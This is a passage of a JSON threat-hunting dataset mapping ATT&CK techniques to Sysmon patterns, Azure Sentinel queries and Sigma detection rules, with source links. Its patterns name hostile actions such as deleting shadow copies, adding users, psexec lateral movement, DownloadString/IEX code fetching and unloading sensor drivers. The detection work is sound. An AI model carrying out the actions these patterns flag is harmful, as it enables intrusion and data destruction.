NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess" + ], + "EventType": "SetValue" + }, + "condition": "selection_reg1" + }, + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1183", + "car.2013-01-002" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LMD - Autoruns" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LOG-MD - Autoruns" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1196", + "command_list": [ + "\\\\Windows\\\\.+\\\\control.exe", + "Shell32.dll,Control_RunDLLAsUser|.cpl" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\control.exe", + "source": "SysmonHunter - Control Panel Items", + "name": "" + }, + { + "command": "Shell32.dll,Control_RunDLLAsUser|.cpl", + "source": "SysmonHunter - Control Panel Items", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Control Panel Items", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\control.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Shell32.dll,Control_RunDLLAsUser|.cpl", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"control \\\\/name\"or process_commandline contains \"rundll32 shell32.dll,Control_RunDLL\")", + "name": "Control Panel Items Process" + }, + { + "product": "Azure Sentinel", + 
"query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\ControlPanel\\\\NameSpace\"or registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Controls Folder\\\\*\\\\Shellex\\\\PropertySheetHandlers\\\\\"or registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Control Panel\\\\\")", + "name": "Control Panel Items Registry" + } + ], + "possible_detections": [ + { + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "experimental", + "description": "Detects the use of a control panel item (.cpl) outside of the System32 folder", + "reference": [ + "https://attack.mitre.org/techniques/T1196/" + ], + "tags": [ + "attack.execution", + "attack.t1196", + "attack.defense_evasion" + ], + "author": "Kyaw Min Thein", + "date": "2019/08/27", + "level": "critical", + "logsource": { + "product": "windows", + "category": "process_creation" + }, + "detection": { + "selection": { + "CommandLine": "*.cpl" + }, + "filter": { + "CommandLine": [ + "*\\System32\\\\*", + "*%System%*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "DLL monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1223", + "command_list": [ + "\\windows\\hh.exe.chm", + "hh.exe|.chm" + ], + "commands": [ + { + "command": 
"\\windows\\hh.exe.chm", + "source": "SysmonHunter - Compiled HTML File", + "name": "" + }, + { + "command": "hh.exe|.chm", + "source": "SysmonHunter - Compiled HTML File", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Compiled HTML File", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\windows\\hh.exe" + } + }, + "file": { + "path": { + "pattern": ".chm" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "hh.exe|.chm", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"hh.exe\"", + "name": "Compiled HTML File" + } + ], + "possible_detections": [], + "external_reference": [ + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + { + "technique_id": "C1000", + "command_list": [ + "\\\\Windows\\\\.+\\\\reg.exe" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\reg.exe", + "source": "SysmonHunter - Registry Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Registry Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\reg.exe", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1001", + "command_list": [ + "nbtscan.exe|psexec", + "net|user|add", + "net|/add" + ], + "commands": [ + { + "command": "nbtscan.exe|psexec", + "source": "SysmonHunter - Lateral Movement", + "name": "" + }, + { + "command": "net|user|add", + "source": 
"SysmonHunter - Lateral Movement", + "name": "" + }, + { + "command": "net|/add", + "source": "SysmonHunter - Lateral Movement", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Lateral Movement", + "description": null, + "level": "high", + "phase": "Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "nbtscan.exe|psexec" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "net|user|add", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "net|/add", + "op": "and" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1002", + "command_list": [ + "\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe" + ], + "commands": [ + { + "command": "\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe", + "source": "SysmonHunter - .Net Environment Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": ".Net Environment Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": 
"\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1003", + "command_list": [ + "inetsrv\\appcmd.exe/dontLog:true", + "fltmc.exeunload|detach", + "vssadmin.exeDelete|Shadows", + "wbadmindelete" + ], + "commands": [ + { + "command": "inetsrv\\appcmd.exe/dontLog:true", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "fltmc.exeunload|detach", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "vssadmin.exeDelete|Shadows", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "wbadmindelete", + "source": "SysmonHunter - None", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": null, + "description": null, + "level": "high", + "phase": "Defense Evasion", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "inetsrv\\appcmd.exe" + }, + "cmdline": { + "pattern": "/dontLog:true" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "fltmc.exe" + }, + "cmdline": { + "pattern": "unload|detach" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "vssadmin.exe" + }, + "cmdline": { + "pattern": "Delete|Shadows", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wbadmin" + }, + "cmdline": { + "pattern": "delete" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1004", + "command_list": [ + 
"\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "\\\\Windows\\\\.+\\\\sc.exequery", + "\\\\Windows\\\\.+\\\\netsh.exeadvfirewall" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "source": "SysmonHunter - Discovery", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\sc.exequery", + "source": "SysmonHunter - Discovery", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\netsh.exeadvfirewall", + "source": "SysmonHunter - Discovery", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Discovery", + "description": null, + "level": "medium", + "phase": "Discovery", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\sc.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "query" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\netsh.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "advfirewall" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1005", + "command_list": [ + "\\\\Windows\\\\.+\\\\svchost.exe-k|DcomLaunch\\Internet Explorer\\iexplore.exe-Embedding" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\svchost.exe-k|DcomLaunch\\Internet Explorer\\iexplore.exe-Embedding", + "source": "SysmonHunter - IE DCOM Launch", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "IE DCOM Launch", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "procchain", + "parent": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\svchost.exe", + 
"flag": "regex" + }, + "cmdline": { + "pattern": "-k|DcomLaunch", + "op": "and" + } + }, + "child": { + "image": { + "pattern": "\\Internet Explorer\\iexplore.exe" + }, + "cmdline": { + "pattern": "-Embedding" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1006", + "command_list": [ + "80|443" + ], + "commands": [ + { + "command": "80|443", + "source": "SysmonHunter - HTTP or HTTPS Communication", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "HTTP or HTTPS Communication", + "description": null, + "level": "medium", + "phase": "Command and Control", + "query": [ + { + "type": "network", + "network": { + "rport": { + "pattern": "80|443" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T0000", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"Get-History\"or process_command_line contains \"AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadline\\\\ConsoleHost_history.txt\"or process_command_line contains \"(Get-PSReadlineOption).HistorySavePath\")", + "name": "Console History" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 17 and (pipe_name contains \"\\\\isapi_http\"or pipe_name contains \"\\\\isapi_dg\"or pipe_name contains \"\\\\isapi_dg2\"or pipe_name contains \"\\\\isapi_http\"or pipe_name contains \"\\\\sdlrpc\"or pipe_name contains \"\\\\aheec\"or pipe_name contains \"\\\\winsession\"or pipe_name contains \"\\\\lsassw\"or pipe_name contains \"\\\\rpchlp_3\"or pipe_name contains \"\\\\NamePipe_MoreWindows\"or pipe_name contains \"\\\\pcheap_reuse\"or pipe_name contains \"\\\\PSEXESVC\"or pipe_name contains \"\\\\PowerShellISEPipeName_\"or pipe_name contains \"\\\\csexec\"or pipe_name contains \"\\\\paexec\"or 
pipe_name contains \"\\\\remcom\")", + "name": "Named Pipes" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 17 and pipe_name contains \"\\\\msagent_\"", + "name": "Named Pipes CobaltStrike" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"qwinsta.exe\"", + "name": "Remotely Query Login Sessions Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"qwinsta.exe\"", + "name": "Remotely Query Login Sessions Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path == \"a.exe\"or process_path == \"b.exe\"or process_path == \"c.exe\"or process_path == \"d.exe\"or process_path == \"e.exe\"or process_path == \"f.exe\"or process_path == \"g.exe\"or process_path == \"h.exe\"or process_path == \"i.exe\"or process_path == \"j.exe\"or process_path == \"k.exe\"or process_path == \"l.exe\"or process_path == \"m.exe\"or process_path == \"n.exe\"or process_path == \"o.exe\"or process_path == \"p.exe\"or process_path == \"q.exe\"or process_path == \"r.exe\"or process_path == \"s.exe\"or process_path == \"t.exe\"or process_path == \"u.exe\"or process_path == \"v.exe\"or process_path == \"w.exe\"or process_path == \"x.exe\"or process_path == \"y.exe\"or process_path == \"z.exe\"or process_path == \"1.exe\"or process_path == \"2.exe\"or process_path == \"3.exe\"or process_path == \"4.exe\"or process_path == \"5.exe\"or process_path == \"6.exe\"or process_path == \"7.exe\"or process_path == \"8.exe\"or process_path == \"9.exe\"or process_path == \"0.exe\"or process_path == \"10.exe\")", + "name": "Suspicious Filename Used" + } + ], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 
or EventID == 14)and registry_key_path contains \"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\\"", + "name": "Local Port Monitor" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "AutoRuns" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ] + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1054", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"fltmc.exe\" or process_command_line contains \"*fltmc*unload*\")", + "name": "Indicator Blocking Driver Unloaded" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SysmonDrv\\\\*\"or registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Sysmon\\\\*\"or registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Sysmon64\\\\*\")and (process_path !contains \"Sysmon64.exe\" or process_path !contains \"Sysmon.exe\")", + "name": "Indicator Blocking Sysmon Registry Edited From Other Source" + } + ], + "possible_detections": [ + { + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. 
Also, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\". Please note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.", + "references": [ + "https://bit.ly/WinLogsZero2Hero" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1054" + ], + "author": "@neu5ron", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Computer Management > Audit Policy Configuration, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit Authorization Policy Change" + }, + "detection": { + "selection": { + "EventID": 4719, + "AuditPolicyChanges": "removed" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688.0" + ], + [ + "Sensor health and status" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sensor health and status" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1063", + "command_list": [ + "powershell/situational_awareness/host/antivirusproduct" + ], + "commands": [ + { + "command": "powershell/situational_awareness/host/antivirusproduct", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/situational_awareness/host/antivirusproduct", + "ATT&CK Technique #1": "T1063", + "ATT&CK Technique #2": "", + "Technique": "Security Software Discovery", + "Concatenate for Python Dictionary": 
"\"powershell/situational_awareness/host/antivirusproduct\": [\"T1063\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and(process_path contains \"netsh.exe\"or process_path contains \"reg.exe\"or process_path contains \"tasklist.exe\")and (process_command_line contains \"*reg* query*\"or process_command_line contains \"*tasklist *\"or process_command_line contains \"*netsh*\"or process_command_line contains \"*fltmc*|*findstr*\")", + "name": "Security Software Discovery" + } + ], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1074", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"DownloadString\"and process_command_line contains \"Net.WebClient\")or (process_command_line contains \"New-Object\"and process_command_line contains \"IEX\")", + "name": "Datal Staged Process" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + 
], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + 
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1089", + "command_list": [ + "powershell/management/disable_rdp" + ], + "commands": [ + { + "command": "powershell/management/disable_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/disable_rdp", + "ATT&CK Technique #1": "T1089", + "ATT&CK Technique #2": "", + "Technique": "Disabling Security Tools", + "Concatenate for Python Dictionary": "\"powershell/management/disable_rdp\": [\"T1089\"]," + } + ], + "queries": [ + { 
+ "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"net.exe\"or process_path contains \"sc.exe\")and file_directory contains \"stop\"", + "name": "Disabling Security Tools Service Stopped" + } + ], + "possible_detections": [ + { + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "references": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/" + ], + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1089" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management" + }, + "detection": { + "selection": { + "EventID": 4738 + }, + "keywords": { + "Message": [ + "*DES*", + "*Preauth*", + "*Encrypted*" + ] + }, + "filters": { + "Message": [ + "*Enabled*" + ] + }, + "condition": "selection and keywords and filters" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4689", + "Process Term" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Changed" + ], + [ + "API monitoring" + ], + [ + "Anti-virus" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4689", + "Process Term" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Changed" + ], + [ + "API monitoring" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf", + 
"https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1093", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and ( ( process_path contains \"smss.exe\" and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"csrss.exe\" and ( process_parent_command_line !contains \"smss.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"wininit.exe\"and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"winlogon.exe\" and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"lsass.exe\" and process_parent_command_line !contains \"wininit.exe\" ) or ( process_path contains \"LogonUI.exe\" and ( process_parent_command_line !contains \"winlogon.exe\" and process_parent_command_line !contains \"wininit.exe\" ) ) or ( process_path contains \"services.exe\" and process_parent_command_line !contains \"wininit.exe\" ) or ( process_path contains \"spoolsv.exe\" and process_parent_command_line !contains 
